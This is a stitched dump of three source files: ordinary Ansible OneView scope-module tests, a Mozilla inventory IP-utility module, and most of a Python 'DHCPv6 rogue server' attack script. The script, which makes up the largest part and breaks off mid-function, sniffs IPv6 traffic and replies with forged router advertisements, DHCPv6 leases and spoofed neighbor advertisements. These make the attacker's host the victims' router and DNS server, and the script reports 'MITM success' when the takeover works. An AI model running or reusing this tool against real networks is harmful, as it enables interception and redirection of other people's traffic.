data=dict(name='ScopeName',
addedResourceUris=['/rest/resource/id-1', '/rest/resource/id-2'],
removedResourceUris=['/rest/resource/id-3'])
)
PARAMS_WITH_CHANGES_HAVING_RESOURCES_2 = dict(
config='config.json',
state='present',
data=dict(name='ScopeName',
addedResourceUris=['/rest/resource/id-1', '/rest/resource/id-2'],
removedResourceUris=['/rest/resource/id-2'])
)
PARAMS_FOR_ABSENT = dict(
config='config.json',
state='absent',
data=dict(name='ScopeName')
)
PARAMS_RESOURCE_ASSIGNMENTS = dict(
config='config.json',
state='resource_assignments_updated',
data=dict(name='ScopeName',
resourceAssignments=dict(addedResourceUris=['/rest/resource/id-1', '/rest/resource/id-2'],
removedResourceUris=['/rest/resource/id-3']))
)
PARAMS_NO_RESOURCE_ASSIGNMENTS = dict(
config='config.json',
state='resource_assignments_updated',
data=dict(name='ScopeName',
resourceAssignments=dict(addedResourceUris=None,
removedResourceUris=None))
)
@pytest.mark.resource(TestScopeModule='scopes')
class TestScopeModule(OneViewBaseTest):
def test_should_create_new_scope_when_not_found(self):
self.resource.get_by_name.return_value = None
self.resource.create.return_value = self.resource
self.resource.data = PARAMS_FOR_PRESENT
self.mock_ansible_module.params = copy.deepcopy(PARAMS_FOR_PRESENT)
ScopeModule().run()
self.mock_ansible_module.exit_json.assert_called_once_with(
changed=True,
msg=ScopeModule.MSG_CREATED,
ansible_facts=dict(scope=PARAMS_FOR_PRESENT)
)
def test_should_not_update_when_data_is_equals(self):
response_data = PARAMS_FOR_PRESENT['data']
self.resource.data = response_data
self.mock_ansible_module.params = PARAMS_FOR_PRESENT
ScopeModule().run()
self.mock_ansible_module.exit_json.assert_called_once_with(
changed=False,
msg=ScopeModule.MSG_ALREADY_PRESENT,
ansible_facts=dict(scope=response_data)
)
def test_should_not_update_when_no_new_add_remove_resources(self):
self.resource.get_by_name.return_value = self.resource
current_data = copy.deepcopy(PARAMS_WITH_CHANGES_HAVING_RESOURCES_1['data'])
self.resource.data = current_data
self.mock_ansible_module.params = PARAMS_WITH_CHANGES_HAVING_RESOURCES_1
ScopeModule().run()
self.mock_ansible_module.exit_json.assert_called_once_with(
changed=True,
msg=ScopeModule.MSG_UPDATED,
ansible_facts=dict(scope=current_data)
)
def test_should_update_when_new_remove_resources(self):
self.resource.get_by_name.return_value = self.resource
current_data = copy.deepcopy(PARAMS_WITH_CHANGES_HAVING_RESOURCES_2['data'])
self.resource.data = current_data
self.mock_ansible_module.params = PARAMS_WITH_CHANGES_HAVING_RESOURCES_2
ScopeModule().run()
self.mock_ansible_module.exit_json.assert_called_once_with(
changed=True,
msg=ScopeModule.MSG_UPDATED,
ansible_facts=dict(scope=current_data)
)
def test_should_update_when_new_add_resources(self):
self.resource.get_by_name.return_value = self.resource
current_data = copy.deepcopy(RESOURCE_ASSIGNMENTS)
self.resource.data = current_data
self.mock_ansible_module.params = PARAMS_WITH_CHANGES_HAVING_RESOURCES_1
ScopeModule().run()
self.mock_ansible_module.exit_json.assert_called_once_with(
changed=True,
msg=ScopeModule.MSG_UPDATED,
ansible_facts=dict(scope=current_data)
)
def test_should_update_when_data_has_changes(self):
data_merged = PARAMS_FOR_PRESENT.copy()
data_merged['name'] = 'ScopeNameRenamed'
self.resource.data = PARAMS_FOR_PRESENT
self.mock_ansible_module.params = PARAMS_WITH_CHANGES
ScopeModule().run()
self.mock_ansible_module.exit_json.assert_called_once_with(
changed=True,
msg=ScopeModule.MSG_UPDATED,
ansible_facts=dict(scope=PARAMS_FOR_PRESENT)
)
def test_should_remove_scope_when_found(self):
self.resource.get_by_name.return_value = self.resource
self.resource.data = PARAMS_FOR_PRESENT
self.mock_ansible_module.params = copy.deepcopy(PARAMS_FOR_ABSENT)
ScopeModule().run()
self.mock_ansible_module.exit_json.assert_called_once_with(
changed=True,
msg=ScopeModule.MSG_DELETED
)
def test_should_not_delete_when_scope_not_found(self):
self.resource.get_by_name.return_value = None
self.mock_ansible_module.params = copy.deepcopy(PARAMS_FOR_ABSENT)
ScopeModule().run()
self.mock_ansible_module.exit_json.assert_called_once_with(
changed=False,
msg=ScopeModule.MSG_ALREADY_ABSENT
)
def test_should_fail_resource_assignments_when_scope_not_found(self):
self.mock_ov_client.api_version = 300
self.resource.get_by_name.return_value = None
self.mock_ansible_module.params = copy.deepcopy(PARAMS_RESOURCE_ASSIGNMENTS)
ScopeModule().run()
self.mock_ansible_module.exit_json.assert_called_once_with(
failed=True,
changed=False,
msg=ScopeModule.MSG_RESOURCE_NOT_FOUND
)
def test_should_not_update_resource_assignments_in_api300(self):
self.mock_ov_client.api_version = 300
self.resource.get_by_name.return_value = self.resource
resource_data = PARAMS_NO_RESOURCE_ASSIGNMENTS.copy()
self.resource.data = resource_data
self.resource.update_resource_assignments.return_value = self.resource
self.mock_ansible_module.params = copy.deepcopy(PARAMS_NO_RESOURCE_ASSIGNMENTS)
ScopeModule().run()
self.mock_ansible_module.exit_json.assert_called_once_with(
changed=False,
ansible_facts=dict(scope=PARAMS_NO_RESOURCE_ASSIGNMENTS),
msg=ScopeModule.MSG_RESOURCE_ASSIGNMENTS_NOT_UPDATED
)
def test_should_add_and_remove_resource_assignments_in_api300(self):
self.mock_ov_client.api_version = 300
self.resource.get_by_name.return_value = self.resource
resource_data = PARAMS_RESOURCE_ASSIGNMENTS.copy()
self.resource.data = resource_data
patch_return = resource_data.copy()
patch_return['scopeUris'] = ['test']
patch_return_obj = self.resource.copy()
patch_return_obj.data = patch_return
self.resource.patch.return_value = patch_return_obj
self.mock_ansible_module.params = copy.deepcopy(PARAMS_RESOURCE_ASSIGNMENTS)
ScopeModule().run()
self.mock_ansible_module.exit_json.assert_called_once_with(
changed=True,
ansible_facts=dict(scope=PARAMS_RESOURCE_ASSIGNMENTS),
msg=ScopeModule.MSG_RESOURCE_ASSIGNMENTS_UPDATED
)
def test_should_update_name_in_api300(self):
self.mock_ov_client.api_version = 300
self.resource.get_by_name.return_value = self.resource
PARAMS_RESOURCE_ASSIGNMENTS_UPDATED_NAME = dict(
config='config.json',
state='resource_assignments_updated',
data=dict(name='ScopeName',
resourceAssignments=dict(name='TestScope'))
)
resource_data = PARAMS_RESOURCE_ASSIGNMENTS_UPDATED_NAME.copy()
self.resource.data = resource_data
patch_return = resource_data.copy()
patch_return['scopeUris'] = ['test']
patch_return_obj = self.resource.copy()
patch_return_obj.data = patch_return
self.resource.patch.return_value = patch_return_obj
self.mock_ansible_module.params = copy.deepcopy(PARAMS_RESOURCE_ASSIGNMENTS_UPDATED_NAME)
ScopeModule().run()
self.mock_ansible_module.exit_json.assert_called_once_with(
changed=True,
ansible_facts=dict(scope=PARAMS_RESOURCE_ASSIGNMENTS_UPDATED_NAME),
msg=ScopeModule.MSG_RESOURCE_ASSIGNMENTS_UPDATED
)
def test_should_update_description_in_api300(self):
self.mock_ov_client.api_version = 300
self.resource.get_by_name.return_value = self.resource
PARAMS_RESOURCE_ASSIGNMENTS_UPDATED_DESCRIPTION = dict(
config='config.json',
state='resource_assignments_updated',
data=dict(name='ScopeName',
resourceAssignments=dict(description='Test'))
)
resource_data = PARAMS_RESOURCE_ASSIGNMENTS_UPDATED_DESCRIPTION.copy()
self.resource.data = resource_data
patch_return = resource_data.copy()
patch_return['scopeUris'] = ['test']
patch_return_obj = self.resource.copy()
patch_return_obj.data = patch_return
self.resource.patch.return_value = patch_return_obj
self.mock_ansible_module.params = copy.deepcopy(PARAMS_RESOURCE_ASSIGNMENTS_UPDATED_DESCRIPTION)
ScopeModule().run()
self.mock_ansible_module.exit_json.assert_called_once_with(
changed=True,
ansible_facts=dict(scope=PARAMS_RESOURCE_ASSIGNMENTS_UPDATED_DESCRIPTION),
msg=ScopeModule.MSG_RESOURCE_ASSIGNMENTS_UPDATED
)
if __name__ == '__main__':
pytest.main([__file__])
| apache-2.0 | -3,200,483,235,945,231,000 | 34.928571 | 104 | 0.653895 | false |
rtucker-mozilla/mozilla_inventory | core/utils.py | 1 | 6521 | from django.db.models import Q
from django.core.exceptions import ValidationError
import ipaddr
import smtplib
from email.mime.text import MIMEText
from settings.local import people_who_need_to_know_about_failures
from settings.local import inventorys_email
# http://dev.mysql.com/doc/refman/5.0/en/miscellaneous-functions.html
# Prevent this case http://people.mozilla.com/~juber/public/t1_t2_scenario.txt
def locked_function(lock_name, timeout=10):
def decorator(f):
def new_function(*args, **kwargs):
from django.db import connection
cursor = connection.cursor()
cursor.execute(
"SELECT GET_LOCK('{lock_name}', {timeout});".format(
lock_name=lock_name, timeout=timeout
)
)
ret = f(*args, **kwargs)
cursor.execute(
"SELECT RELEASE_LOCK('{lock_name}');".format(
lock_name=lock_name
)
)
return ret
return new_function
return decorator
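# Illustrative usage of locked_function (the lock name and the decorated
# function below are hypothetical):
#
#   @locked_function('inventory.allocate_ip', timeout=30)
#   def allocate_ip(ip_range):
#       ...  # critical section serialized across processes via MySQL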
def fail_mail(content, subject='Inventory is having issues.',
to=people_who_need_to_know_about_failures,
from_=inventorys_email):
"""Send email about a failure."""
msg = MIMEText(content)
msg['Subject'] = subject
    msg['From'] = from_
# msg['To'] = to
s = smtplib.SMTP('localhost')
s.sendmail(from_, to, msg.as_string())
s.quit()
class IPFilterSet(object):
"""The IPFilterSet expects that all IPFilters added to it are of the same
type. This might be useful later.
"""
def __init__(self):
self.ipfs = []
def add(self, ipf):
self.ipfs.append(ipf)
def pprint(self):
for ipf in self.ipfs:
print ipf
def pprint_intersect(self):
for intersect in self.calc_intersect():
print intersect
def calc_intersect(self):
"""
        This is where the magic comes from. Given a list of IPFilter objects,
        figure out the ranges that are common to all of the IPFilters, and
        create a new list of IPFilter objects representing those ranges.
"""
def trim(self, r, rs, ip_type):
if not (rs and r):
return r
r1 = rs[0]
rx = self.intersect(r, r1, ip_type)
return self.trim(rx, rs[1:], ip_type)
def intersect(self, r1, r2, ip_type):
"""Cases:
* Subset or equal
* Left intersect
* Right intersect
* No intersect
"""
if r1.start > r2.end:
return None
# We have intersection somewhere.
        if r1.start == r2.start and r1.end == r2.end:
# r1 is subset of r2
# Low High
# r1 |---------|
# r2 |---------|
# rx |---------|
return r1
if r1.start > r2.start and r1.end < r2.end:
# r1 is subset of r2
# Low High
# r1 |-------|
# r2 |---------|
# rx |---------|
return r1
if r1.start > r2.start and r1.end > r2.start:
# Low High
# r1 |---------|
# r2 |---------|
# rx |------|
            return IPFilter(r1.start, r2.end, ip_type)
if r1.start < r2.start and r1.end < r2.end:
# Low High
# r1 |---------|
# r2 |---------|
# rx |------|
            return IPFilter(r2.start, r1.end, ip_type)
class IPFilter(object):
def __init__(self, start, end, ip_type, object_=None):
self.object_ = object_ # The composite object (it can be None)
self.ip_type = ip_type
self.start, self.end, self.Q = start_end_filter(start, end, ip_type)
def __str__(self):
return "{0} -- {1}".format(self.start, self.end)
def __repr__(self):
return str(self)
def start_end_filter(start, end, ip_type):
ip_type = ip_type
if ip_type == '6':
IPKlass = ipaddr.IPv6Address
elif ip_type == '4':
IPKlass = ipaddr.IPv4Address
istart = IPKlass(start)
iend = IPKlass(end)
if int(istart) == int(iend):
raise ValidationError("start and end cannot be equal")
elif int(istart) > int(iend):
raise ValidationError("start cannot be greater than end")
start_upper, start_lower = one_to_two(int(istart))
end_upper, end_lower = one_to_two(int(iend))
# Equal uppers. Lower must be within.
if start_upper == end_upper:
q = Q(ip_upper=start_upper,
ip_lower__gte=start_lower,
ip_lower__lte=end_lower,
ip_type=ip_type)
else:
q = Q(ip_upper__gt=start_upper, ip_upper__lt=end_upper,
ip_type=ip_type)
return istart, iend, q
def networks_to_Q(networks):
"""Take a list of network objects and compile a Q that matches any object
that exists in one of those networks."""
q = Q()
for network in networks:
network.update_ipf()
q = q | network.ipf.Q
return q
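# Illustrative use of networks_to_Q (a sketch; the Network/AddressRecord models
# named below are assumptions, not part of this module):
#
#   q = networks_to_Q(Network.objects.filter(site=site))
#   records = AddressRecord.objects.filter(q)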
def two_to_four(start, end):
start_upper = start >> 64
start_lower = start & (1 << 64) - 1
end_upper = end >> 64
end_lower = end & (1 << 64) - 1
return start_upper, start_lower, end_upper, end_lower
def one_to_two(ip):
return (ip >> 64, ip & (1 << 64) - 1)
def two_to_one(upper, lower):
return long(upper << 64) + long(lower)
def four_to_two(start_upper, start_lower, end_upper, end_lower):
start = (start_upper << 64) + start_lower
end = (end_upper << 64) + end_lower
return start, end
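# Example of the 64-bit split helpers above (illustrative only): a 128-bit value
# (upper << 64) + lower round-trips through one_to_two()/two_to_one(), e.g.
#
#   upper, lower = one_to_two((1 << 64) + 2)   # -> (1, 2)
#   assert two_to_one(upper, lower) == (1 << 64) + 2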
def int_to_ip(ip, ip_type):
"""A wrapper that converts a 32 or 128 bit integer into human readable IP
format."""
if ip_type == '6':
IPKlass = ipaddr.IPv6Address
elif ip_type == '4':
IPKlass = ipaddr.IPv4Address
return str(IPKlass(ip))
def resolve_ip_type(ip_str):
if ip_str.find(':') > -1:
Klass = ipaddr.IPv6Network
ip_type = '6'
elif ip_str.find('.') > -1:
Klass = ipaddr.IPv4Network
ip_type = '4'
else:
Klass = None
ip_type = None
return ip_type, Klass
def to_a(text, obj):
return "<a href='{0}'>{1}</a>".format(obj.absolute_url(), text)
| bsd-3-clause | 522,087,460,123,051,500 | 28.776256 | 78 | 0.535501 | false |
Vladimir-Ivanov-Git/raw-packet | Scripts/DHCP/dhcpv6_rogue_server.py | 1 | 36326 | #!/usr/bin/env python
# region Import
from sys import path
from os.path import dirname, abspath
project_root_path = dirname(dirname(dirname(abspath(__file__))))
utils_path = project_root_path + "/Utils/"
path.append(utils_path)
from base import Base
from network import Ethernet_raw, IPv6_raw, ICMPv6_raw, UDP_raw, DHCPv6_raw
from tm import ThreadManager
from sys import exit
from argparse import ArgumentParser
from socket import socket, AF_PACKET, SOCK_RAW, htons
from random import randint
from time import sleep
from os import errno
import subprocess as sub
# endregion
# region Check user, platform and create threads
Base = Base()
Base.check_user()
Base.check_platform()
tm = ThreadManager(5)
# endregion
# region Parse script arguments
parser = ArgumentParser(description='DHCPv6 Rogue server')
parser.add_argument('-i', '--interface', help='Set interface name for send reply packets')
parser.add_argument('-p', '--prefix', type=str, help='Set network prefix', default='fd00::/64')
parser.add_argument('-f', '--first_suffix', type=int, help='Set first suffix client IPv6 for offering', default=2)
parser.add_argument('-l', '--last_suffix', type=int, help='Set last suffix client IPv6 for offering', default=255)
parser.add_argument('-t', '--target_mac', type=str, help='Set target MAC address', default=None)
parser.add_argument('-T', '--target_ipv6', type=str, help='Set client Global IPv6 address with MAC in --target_mac',
default=None)
parser.add_argument('-D', '--disable_dhcpv6', action='store_true', help='Do not use DHCPv6 protocol')
parser.add_argument('-d', '--dns', type=str, help='Set recursive DNS IPv6 address', default=None)
parser.add_argument('-s', '--dns_search', type=str, help='Set DNS search list', default="local")
parser.add_argument('--delay', type=int, help='Set delay between packets', default=1)
parser.add_argument('-q', '--quiet', action='store_true', help='Minimal output')
args = parser.parse_args()
# endregion
# region Print banner if argument quit is not set
if not args.quiet:
Base.print_banner()
# endregion
# region Set global variables
eth = Ethernet_raw()
ipv6 = IPv6_raw()
icmpv6 = ICMPv6_raw()
udp = UDP_raw()
dhcpv6 = DHCPv6_raw()
recursive_dns_address = None
target_mac_address = None
target_ipv6_address = None
first_suffix = None
last_suffix = None
clients = {}
icmpv6_router_solicitation_address = "33:33:00:00:00:02"
dhcpv6_requests_address = "33:33:00:01:00:02"
# endregion
# region Disable or Enable DHCPv6 protocol
disable_dhcpv6 = False
if args.disable_dhcpv6:
disable_dhcpv6 = True
# endregion
# region Get your network settings
if args.interface is None:
Base.print_warning("Please set a network interface for sniffing ICMPv6 and DHCPv6 requests ...")
current_network_interface = Base.netiface_selection(args.interface)
your_mac_address = Base.get_netiface_mac_address(current_network_interface)
if your_mac_address is None:
print Base.c_error + "Network interface: " + current_network_interface + " do not have MAC address!"
exit(1)
your_local_ipv6_address = Base.get_netiface_ipv6_link_address(current_network_interface)
if your_local_ipv6_address is None:
print Base.c_error + "Network interface: " + current_network_interface + " do not have IPv6 link local address!"
exit(1)
# endregion
# region Create raw socket
global_socket = socket(AF_PACKET, SOCK_RAW)
global_socket.bind((current_network_interface, 0))
# endregion
# region Set search domain and Network prefix
dns_search = args.dns_search
network_prefix = args.prefix
network_prefix_address = network_prefix.split('/')[0]
network_prefix_length = network_prefix.split('/')[1]
# endregion
# region Set target MAC and IPv6 address, if target IP is not set - get first and last suffix IPv6 address
# region Set target IPv6 address
if args.target_mac is not None:
target_mac_address = str(args.target_mac).lower()
# endregion
# region Target IPv6 is set
if args.target_ipv6 is not None:
if args.target_mac is not None:
if not Base.ipv6_address_validation(args.target_ipv6):
Base.print_error("Bad target IPv6 address in `-T, --target_ipv6` parameter: ", args.target_ipv6)
exit(1)
else:
target_ipv6_address = args.target_ipv6
clients[target_mac_address] = {'advertise address': target_ipv6_address}
else:
Base.print_error("Please set target MAC address (example: --target_mac 00:AA:BB:CC:DD:FF)" +
", for target IPv6 address: ", args.target_ipv6)
exit(1)
# endregion
# region Target IPv6 is not set - get first and last suffix IPv6 address
else:
# Check first suffix IPv6 address
if 1 < args.first_suffix < 65535:
first_suffix = args.first_suffix
else:
Base.print_error("Bad value `-f, --first_suffix`: ", args.first_suffix,
"; first suffix IPv6 address must be in range: ", "1 - 65535")
exit(1)
# Check last suffix IPv6 address
if args.last_suffix > first_suffix:
if 1 < args.last_suffix < 65535:
last_suffix = args.last_suffix
else:
Base.print_error("Bad value `-l, --last_suffix`: ", args.first_suffix,
"; last suffix IPv6 address must be in range: ", "1 - 65535")
exit(1)
else:
Base.print_error("Bad value `-l, --last_suffix`: ", args.first_suffix,
"; last suffix IPv6 address should be more first suffix IPv6 address: ", str(first_suffix))
exit(1)
# endregion
# endregion
# region Set recursive DNS server address
if args.dns is None:
recursive_dns_address = your_local_ipv6_address
else:
if Base.ipv6_address_validation(args.dns):
recursive_dns_address = args.dns
else:
Base.print_error("Bad DNS server IPv6 address in `--dns` parameter: ", args.dns)
exit(1)
# endregion
# region General output
if not args.quiet:
Base.print_info("Network interface: ", current_network_interface)
Base.print_info("Your MAC address: ", your_mac_address)
Base.print_info("Your link local IPv6 address: ", your_local_ipv6_address)
if target_mac_address is not None:
Base.print_info("Target MAC: ", target_mac_address)
if target_ipv6_address is not None:
Base.print_info("Target Global IPv6: ", target_ipv6_address)
else:
Base.print_info("First suffix offer IP: ", str(first_suffix))
Base.print_info("Last suffix offer IP: ", str(last_suffix))
Base.print_info("Prefix: ", network_prefix)
Base.print_info("Router IPv6 address: ", your_local_ipv6_address)
Base.print_info("DNS IPv6 address: ", recursive_dns_address)
Base.print_info("Domain search: ", dns_search)
# endregion
# region Add client info in global clients dictionary
def add_client_info_in_dictionary(client_mac_address, client_info, this_client_already_in_dictionary=False):
if this_client_already_in_dictionary:
clients[client_mac_address].update(client_info)
else:
clients[client_mac_address] = client_info
# endregion
# region Send ICMPv6 solicit packets
def send_icmpv6_solicit_packets():
icmpv6_solicit_raw_socket = socket(AF_PACKET, SOCK_RAW)
icmpv6_solicit_raw_socket.bind((current_network_interface, 0))
try:
while True:
icmpv6_solicit_packet = icmpv6.make_router_solicit_packet(ethernet_src_mac=your_mac_address,
ipv6_src=your_local_ipv6_address,
need_source_link_layer_address=True,
source_link_layer_address=eth.get_random_mac())
icmpv6_solicit_raw_socket.send(icmpv6_solicit_packet)
sleep(int(args.delay))
except KeyboardInterrupt:
Base.print_info("Exit")
icmpv6_solicit_raw_socket.close()
exit(0)
# endregion
# region Send DHCPv6 solicit packets
def send_dhcpv6_solicit_packets():
dhcpv6_solicit_raw_socket = socket(AF_PACKET, SOCK_RAW)
dhcpv6_solicit_raw_socket.bind((current_network_interface, 0))
try:
while True:
Client_DUID = dhcpv6.get_duid(eth.get_random_mac())
request_options = [23, 24]
dhcpv6_solicit_packet = dhcpv6.make_solicit_packet(ethernet_src_mac=your_mac_address,
ipv6_src=your_local_ipv6_address,
transaction_id=randint(1, 16777215),
client_identifier=Client_DUID,
option_request_list=request_options)
dhcpv6_solicit_raw_socket.send(dhcpv6_solicit_packet)
sleep(int(args.delay))
except KeyboardInterrupt:
Base.print_info("Exit")
dhcpv6_solicit_raw_socket.close()
exit(0)
# endregion
# region Send ICMPv6 advertise packets
def send_icmpv6_advertise_packets():
icmpv6_advertise_raw_socket = socket(AF_PACKET, SOCK_RAW)
icmpv6_advertise_raw_socket.bind((current_network_interface, 0))
icmpv6_ra_packet = icmpv6.make_router_advertisement_packet(ethernet_src_mac=your_mac_address,
ethernet_dst_mac="33:33:00:00:00:01",
ipv6_src=your_local_ipv6_address,
ipv6_dst="ff02::1",
dns_address=recursive_dns_address,
domain_search=dns_search,
prefix=network_prefix,
router_lifetime=5000,
advertisement_interval=int(args.delay) * 1000)
try:
while True:
icmpv6_advertise_raw_socket.send(icmpv6_ra_packet)
sleep(int(args.delay))
except KeyboardInterrupt:
Base.print_info("Exit")
icmpv6_advertise_raw_socket.close()
exit(0)
# endregion
# region Reply to DHCPv6 and ICMPv6 requests
def reply(request):
# region Define global variables
global global_socket
global disable_dhcpv6
global clients
global target_ipv6_address
global first_suffix
global last_suffix
# endregion
# region Get client MAC address
client_mac_address = request['Ethernet']['source']
# endregion
# region Check this client already in global clients dictionary
client_already_in_dictionary = False
if client_mac_address in clients.keys():
client_already_in_dictionary = True
# endregion
# region ICMPv6
if 'ICMPv6' in request.keys():
# region ICMPv6 Router Solicitation
if request['ICMPv6']['type'] == 133:
# Make and send ICMPv6 router advertisement packet
icmpv6_ra_packet = icmpv6.make_router_advertisement_packet(ethernet_src_mac=your_mac_address,
ethernet_dst_mac=request['Ethernet']['source'],
ipv6_src=your_local_ipv6_address,
ipv6_dst=request['IPv6']['source-ip'],
dns_address=recursive_dns_address,
domain_search=dns_search,
prefix=network_prefix,
router_lifetime=5000)
global_socket.send(icmpv6_ra_packet)
# Print info messages
Base.print_info("ICMPv6 Router Solicitation request from: ", request['IPv6']['source-ip'] +
" (" + request['Ethernet']['source'] + ")")
Base.print_info("ICMPv6 Router Advertisement reply to: ", request['IPv6']['source-ip'] +
" (" + request['Ethernet']['source'] + ")")
# Delete this client from global clients dictionary
try:
del clients[client_mac_address]
client_already_in_dictionary = False
except KeyError:
pass
# Add client info in global clients dictionary
add_client_info_in_dictionary(client_mac_address,
{"router solicitation": True,
"network prefix": network_prefix},
client_already_in_dictionary)
# endregion
# region ICMPv6 Neighbor Solicitation
if request['ICMPv6']['type'] == 135:
# region Get ICMPv6 Neighbor Solicitation target address
target_address = request['ICMPv6']['target-address']
# endregion
# region Network prefix in ICMPv6 Neighbor Solicitation target address is bad
if not target_address.startswith('fe80::'):
if not target_address.startswith(network_prefix_address):
na_packet = icmpv6.make_neighbor_advertisement_packet(ethernet_src_mac=your_mac_address,
ipv6_src=your_local_ipv6_address,
target_ipv6_address=target_address)
for _ in range(5):
global_socket.send(na_packet)
# endregion
# region ICMPv6 Neighbor Solicitation target address is your local IPv6 address
if target_address == your_local_ipv6_address:
# Add client info in global clients dictionary
add_client_info_in_dictionary(client_mac_address,
{"neighbor solicitation your address": True},
client_already_in_dictionary)
# endregion
# region DHCPv6 advertise address is set
# This client already in dictionary
if client_already_in_dictionary:
# Advertise address for this client is set
if 'advertise address' in clients[client_mac_address].keys():
# ICMPv6 Neighbor Solicitation target address is DHCPv6 advertise IPv6 address
if target_address == clients[client_mac_address]['advertise address']:
# Add client info in global clients dictionary
add_client_info_in_dictionary(client_mac_address,
{"neighbor solicitation advertise address": True},
client_already_in_dictionary)
# ICMPv6 Neighbor Solicitation target address is not DHCPv6 advertise IPv6 address
else:
if not target_address.startswith('fe80::'):
na_packet = icmpv6.make_neighbor_advertisement_packet(ethernet_src_mac=your_mac_address,
ipv6_src=your_local_ipv6_address,
target_ipv6_address=target_address)
for _ in range(5):
global_socket.send(na_packet)
# endregion
# region Print MITM Success message
if not disable_dhcpv6:
try:
if clients[client_mac_address]['dhcpv6 mitm'] == 'success':
test = clients[client_mac_address]['neighbor solicitation your address']
try:
test = clients[client_mac_address]['success message']
except KeyError:
Base.print_success("MITM success: ",
clients[client_mac_address]['advertise address'] +
" (" + client_mac_address + ")")
clients[client_mac_address].update({"success message": True})
except KeyError:
pass
# endregion
# endregion
# endregion
# region DHCPv6
# Protocol DHCPv6 is enabled
if not disable_dhcpv6:
if 'DHCPv6' in request.keys():
# region DHCPv6 Solicit
if request['DHCPv6']['message-type'] == 1:
# Get Client DUID time from Client Identifier DUID
client_duid_time = 0
for dhcpv6_option in request['DHCPv6']['options']:
if dhcpv6_option['type'] == 1:
client_duid_time = dhcpv6_option['value']['duid-time']
# Set IPv6 address in advertise packet
if target_ipv6_address is not None:
ipv6_address = target_ipv6_address
else:
ipv6_address = network_prefix.split('/')[0] + str(randint(first_suffix, last_suffix))
# Make and send DHCPv6 advertise packet
dhcpv6_advertise = dhcpv6.make_advertise_packet(ethernet_src_mac=your_mac_address,
ethernet_dst_mac=request['Ethernet']['source'],
ipv6_src=your_local_ipv6_address,
ipv6_dst=request['IPv6']['source-ip'],
transaction_id=request['DHCPv6']['transaction-id'],
dns_address=recursive_dns_address,
domain_search=dns_search,
ipv6_address=ipv6_address,
client_duid_timeval=client_duid_time)
global_socket.send(dhcpv6_advertise)
# Print info messages
Base.print_info("DHCPv6 Solicit from: ", request['IPv6']['source-ip'] +
" (" + request['Ethernet']['source'] + ")",
" XID: ", hex(request['DHCPv6']['transaction-id']))
Base.print_info("DHCPv6 Advertise to: ", request['IPv6']['source-ip'] +
" (" + request['Ethernet']['source'] + ")",
" XID: ", hex(request['DHCPv6']['transaction-id']),
" IAA: ", ipv6_address)
# Add client info in global clients dictionary
add_client_info_in_dictionary(client_mac_address,
{"dhcpv6 solicit": True,
"advertise address": ipv6_address},
client_already_in_dictionary)
# endregion
# region DHCPv6 Request
if request['DHCPv6']['message-type'] == 3:
# Set DHCPv6 reply packet
dhcpv6_reply = None
# region Get Client DUID time, IPv6 address and Server MAC address
client_duid_time = 0
client_ipv6_address = None
server_mac_address = None
for dhcpv6_option in request['DHCPv6']['options']:
if dhcpv6_option['type'] == 1:
client_duid_time = dhcpv6_option['value']['duid-time']
if dhcpv6_option['type'] == 2:
server_mac_address = dhcpv6_option['value']['mac-address']
if dhcpv6_option['type'] == 3:
client_ipv6_address = dhcpv6_option['value']['ipv6-address']
# endregion
if server_mac_address and client_ipv6_address is not None:
# Check Server MAC address
if server_mac_address != your_mac_address:
add_client_info_in_dictionary(client_mac_address,
{"dhcpv6 mitm":
"error: server mac address is not your mac address"},
client_already_in_dictionary)
else:
add_client_info_in_dictionary(client_mac_address,
{"dhcpv6 mitm": "success"},
client_already_in_dictionary)
try:
if client_ipv6_address == clients[client_mac_address]['advertise address']:
dhcpv6_reply = dhcpv6.make_reply_packet(ethernet_src_mac=your_mac_address,
ethernet_dst_mac=request['Ethernet']['source'],
ipv6_src=your_local_ipv6_address,
ipv6_dst=request['IPv6']['source-ip'],
transaction_id=request['DHCPv6']
['transaction-id'],
dns_address=recursive_dns_address,
domain_search=dns_search,
ipv6_address=client_ipv6_address,
client_duid_timeval=client_duid_time)
global_socket.send(dhcpv6_reply)
else:
add_client_info_in_dictionary(client_mac_address,
{"dhcpv6 mitm":
"error: client request address is not advertise address"},
client_already_in_dictionary)
except KeyError:
add_client_info_in_dictionary(client_mac_address,
{"dhcpv6 mitm":
"error: not found dhcpv6 solicit request for this client"},
client_already_in_dictionary)
# Print info messages
Base.print_info("DHCPv6 Request from: ", request['IPv6']['source-ip'] +
" (" + request['Ethernet']['source'] + ")",
" XID: ", hex(request['DHCPv6']['transaction-id']),
" Server: ", server_mac_address,
" IAA: ", client_ipv6_address)
if dhcpv6_reply is not None:
Base.print_info("DHCPv6 Reply to: ", request['IPv6']['source-ip'] +
" (" + request['Ethernet']['source'] + ")",
" XID: ", hex(request['DHCPv6']['transaction-id']),
" Server: ", server_mac_address,
" IAA: ", client_ipv6_address)
else:
if clients[client_mac_address]["dhcpv6 mitm"] == \
"error: server mac address is not your mac address":
Base.print_error("Server MAC address in DHCPv6 Request is not your MAC address " +
"for this client: ", client_mac_address)
if clients[client_mac_address]["dhcpv6 mitm"] == \
"error: client request address is not advertise address":
Base.print_error("Client requested IPv6 address is not advertise IPv6 address " +
"for this client: ", client_mac_address)
if clients[client_mac_address]["dhcpv6 mitm"] == \
"error: not found dhcpv6 solicit request for this client":
Base.print_error("Could not found DHCPv6 solicit request " +
"for this client: ", client_mac_address)
# endregion
# region DHCPv6 Release
if request['DHCPv6']['message-type'] == 8:
# Print info message
Base.print_info("DHCPv6 Release from: ", request['IPv6']['source-ip'] +
" (" + request['Ethernet']['source'] + ")",
" XID: ", hex(request['DHCPv6']['transaction-id']))
# Delete this client from global clients dictionary
try:
del clients[client_mac_address]
client_already_in_dictionary = False
except KeyError:
pass
# endregion
# region DHCPv6 Confirm
if request['DHCPv6']['message-type'] == 4:
# region Get Client DUID time and client IPv6 address
client_duid_time = 0
client_ipv6_address = None
for dhcpv6_option in request['DHCPv6']['options']:
if dhcpv6_option['type'] == 1:
client_duid_time = dhcpv6_option['value']['duid-time']
if dhcpv6_option['type'] == 3:
client_ipv6_address = dhcpv6_option['value']['ipv6-address']
# endregion
# region Make and send DHCPv6 Reply packet
dhcpv6_reply = dhcpv6.make_reply_packet(ethernet_src_mac=your_mac_address,
ethernet_dst_mac=request['Ethernet']['source'],
ipv6_src=your_local_ipv6_address,
ipv6_dst=request['IPv6']['source-ip'],
transaction_id=request['DHCPv6']['transaction-id'],
dns_address=recursive_dns_address,
domain_search=dns_search,
ipv6_address=client_ipv6_address,
client_duid_timeval=client_duid_time)
global_socket.send(dhcpv6_reply)
# endregion
# region Add Client info in global clients dictionary and print info message
